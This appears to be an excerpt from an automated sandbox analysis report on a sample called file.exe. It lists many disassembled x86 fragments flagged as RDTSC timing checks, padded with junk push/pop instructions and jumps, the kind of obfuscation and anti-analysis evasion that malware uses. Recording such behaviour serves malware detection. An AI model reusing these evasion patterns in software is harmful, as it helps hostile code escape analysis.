Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533033F second address: 533037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov ebx, 5E5558D0h 0x00000010 mov bh, 31h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 jmp 00007F1BE4ECC06Eh 0x0000001b push ecx 0x0000001c call 00007F1BE4ECC071h 0x00000021 pop ecx 0x00000022 pop edi 0x00000023 popad 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53403B9 second address: 5340400 instructions: 0x00000000 rdtsc 0x00000002 mov ch, C4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F1BE47673CFh 0x0000000c and ecx, 0259A61Eh 0x00000012 jmp 00007F1BE47673D9h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BE47673CDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340400 second address: 5340489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, bx 0x0000000e mov dx, A0DEh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F1BE4ECC06Bh 0x0000001b jmp 00007F1BE4ECC073h 0x00000020 popfd 0x00000021 mov dx, si 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F1BE4ECC072h 0x0000002c mov eax, dword ptr [ebp+08h] 0x0000002f jmp 00007F1BE4ECC070h 0x00000034 and dword ptr [eax], 00000000h 0x00000037 jmp 00007F1BE4ECC070h 0x0000003c and dword ptr [eax+04h], 00000000h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340489 second address: 53404A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532054C second address: 5320552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320552 second address: 5320574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bx, D12Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320574 second address: 532059B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC075h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d movzx ecx, di 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cx, 5951h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532059B second address: 53205BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1BE47673D4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53205BB second address: 53205BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53205BF second address: 53205C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53205C5 second address: 5320618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 1AA1E0DDh 0x00000011 pushad 0x00000012 mov ch, EEh 0x00000014 pushfd 0x00000015 jmp 00007F1BE4ECC075h 0x0000001a and cx, AB26h 0x0000001f jmp 00007F1BE4ECC071h 0x00000024 popfd 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320618 second address: 532062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330E9B second address: 5330E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330E9F second address: 5330EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330EA5 second address: 5330F00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, AF23h 0x0000000f pushad 0x00000010 mov cl, 5Ah 0x00000012 pushfd 0x00000013 jmp 00007F1BE4ECC06Bh 0x00000018 sub eax, 23763C4Eh 0x0000001e jmp 00007F1BE4ECC079h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F1BE4ECC06Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330F00 second address: 5330F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330F06 second address: 5330F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330F0A second address: 5330F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d movsx edi, cx 0x00000010 popad 0x00000011 mov cl, 1Eh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F1BE47673CFh 0x0000001b pop ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f movzx esi, bx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53401FA second address: 5340209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340209 second address: 5340252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BE47673D5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007F1BE47673CEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1BE47673D7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340252 second address: 534027B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov edi, 22510E96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1BE4ECC078h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360699 second address: 536069F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536069F second address: 53606A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606A3 second address: 53606A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606A7 second address: 53606C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F1BE4ECC06Bh 0x00000011 pop eax 0x00000012 movsx edi, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606C3 second address: 53606C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606C9 second address: 5360764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F1BE4ECC079h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1BE4ECC06Eh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F1BE4ECC06Eh 0x0000001d adc cx, C2D8h 0x00000022 jmp 00007F1BE4ECC06Bh 0x00000027 popfd 0x00000028 jmp 00007F1BE4ECC078h 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F1BE4ECC06Bh 0x00000034 xchg eax, ecx 0x00000035 pushad 0x00000036 movzx eax, bx 0x00000039 push ebx 0x0000003a movzx ecx, dx 0x0000003d pop edx 0x0000003e popad 0x0000003f mov eax, dword ptr [76FA65FCh] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F1BE4ECC06Eh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360764 second address: 536076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536076A second address: 53607D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F1BE4ECC070h 0x00000010 je 00007F1C56A8F23Eh 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a push esi 0x0000001b pushfd 0x0000001c jmp 00007F1BE4ECC079h 0x00000021 xor al, 00000046h 0x00000024 jmp 00007F1BE4ECC071h 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov ecx, eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1BE4ECC06Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53607D8 second address: 5360844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BE47673D1h 0x00000009 add si, 4956h 0x0000000e jmp 00007F1BE47673D1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F1BE47673D0h 0x0000001a sub si, BB78h 0x0000001f jmp 00007F1BE47673CBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xor eax, dword ptr [ebp+08h] 0x0000002b jmp 00007F1BE47673CFh 0x00000030 and ecx, 1Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360844 second address: 536085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536085F second address: 5360886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ror eax, cl 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE47673D9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360886 second address: 5360931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F1BE4ECC06Eh 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00AF2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007F1BE977C853h 0x0000002a push FFFFFFFEh 0x0000002c pushad 0x0000002d call 00007F1BE4ECC06Eh 0x00000032 pushfd 0x00000033 jmp 00007F1BE4ECC072h 0x00000038 add esi, 65199F58h 0x0000003e jmp 00007F1BE4ECC06Bh 0x00000043 popfd 0x00000044 pop esi 0x00000045 pushfd 0x00000046 jmp 00007F1BE4ECC079h 0x0000004b xor al, FFFFFFF6h 0x0000004e jmp 00007F1BE4ECC071h 0x00000053 popfd 0x00000054 popad 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F1BE4ECC078h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360931 second address: 5360940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360940 second address: 5360946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360946 second address: 536094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536094A second address: 5360994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F1BE977C8F2h 0x00000010 mov edi, edi 0x00000012 jmp 00007F1BE4ECC077h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F1BE4ECC076h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F1BE4ECC06Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360994 second address: 53609E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1BE47673D4h 0x00000011 and esi, 5AA42D98h 0x00000017 jmp 00007F1BE47673CBh 0x0000001c popfd 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1BE47673CCh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53609E1 second address: 53609E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53609E7 second address: 5360A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1BE47673CCh 0x00000009 and ax, AF28h 0x0000000e jmp 00007F1BE47673CBh 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BE47673D1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360A21 second address: 5360A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310034 second address: 5310043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310043 second address: 5310052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310052 second address: 5310056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310056 second address: 531005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531005C second address: 531009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F1BE47673CCh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F1BE47673D1h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, bx 0x0000001c call 00007F1BE47673CFh 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531009C second address: 53100C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BE4ECC06Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53100C7 second address: 53100D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53100D6 second address: 5310100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F1BE4ECC06Ah 0x00000011 mov dword ptr [esp], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F1BE4ECC06Dh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310100 second address: 53101C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7E902CE9h 0x00000008 jmp 00007F1BE47673D6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F1BE47673D0h 0x00000016 push eax 0x00000017 jmp 00007F1BE47673CBh 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov edi, eax 0x00000020 pushfd 0x00000021 jmp 00007F1BE47673D0h 0x00000026 adc si, 4348h 0x0000002b jmp 00007F1BE47673CBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F1BE47673D4h 0x0000003c sbb ecx, 38B505A8h 0x00000042 jmp 00007F1BE47673CBh 0x00000047 popfd 0x00000048 pushfd 0x00000049 jmp 00007F1BE47673D8h 0x0000004e and cl, 00000008h 0x00000051 jmp 00007F1BE47673CBh 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push edx 0x0000005d pop esi 0x0000005e mov si, di 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53101C3 second address: 53101F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F1BE4ECC072h 0x0000000b xor ah, FFFFFF98h 0x0000000e jmp 00007F1BE4ECC06Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov ch, F1h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53101F6 second address: 531022C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 jmp 00007F1BE47673D4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BE47673D7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531022C second address: 531024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Fh 0x00000008 movzx esi, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531024D second address: 5310253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5310253 second address: 53102AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov edx, 04197694h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F1BE4ECC076h 0x00000015 pushfd 0x00000016 jmp 00007F1BE4ECC072h 0x0000001b sbb al, 00000078h 0x0000001e jmp 00007F1BE4ECC06Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], edi 0x00000028 pushad 0x00000029 mov bl, al 0x0000002b popad 0x0000002c test esi, esi 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53102AA second address: 53102D0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1BE47673D4h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F1BE47673CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53102D0 second address: 53102EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007F1C56ADA3A5h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE4ECC070h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53102EE second address: 531034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F1BE47673D6h 0x00000015 je 00007F1C563756D7h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1BE47673CDh 0x00000024 or si, 6636h 0x00000029 jmp 00007F1BE47673D1h 0x0000002e popfd 0x0000002f mov ecx, 4A71CE27h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531034E second address: 531036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC078h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531036A second address: 531036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531036E second address: 53103EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1BE4ECC06Dh 0x00000012 sbb cx, 38F6h 0x00000017 jmp 00007F1BE4ECC071h 0x0000001c popfd 0x0000001d mov cx, 79E7h 0x00000021 popad 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 jmp 00007F1BE4ECC06Ah 0x0000002a test edx, 61000000h 0x00000030 pushad 0x00000031 push esi 0x00000032 pushfd 0x00000033 jmp 00007F1BE4ECC06Dh 0x00000038 or ecx, 32B51506h 0x0000003e jmp 00007F1BE4ECC071h 0x00000043 popfd 0x00000044 pop ecx 0x00000045 mov esi, edx 0x00000047 popad 0x00000048 jne 00007F1C56ADA30Bh 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53103EF second address: 53103F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53103F5 second address: 5310436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F1BE4ECC076h 0x00000012 jne 00007F1C56ADA2DDh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov bx, si 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300901 second address: 5300906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300906 second address: 5300948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC06Dh 0x00000008 mov bx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1BE4ECC06Ah 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx ebx, si 0x0000001e jmp 00007F1BE4ECC076h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300948 second address: 530094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
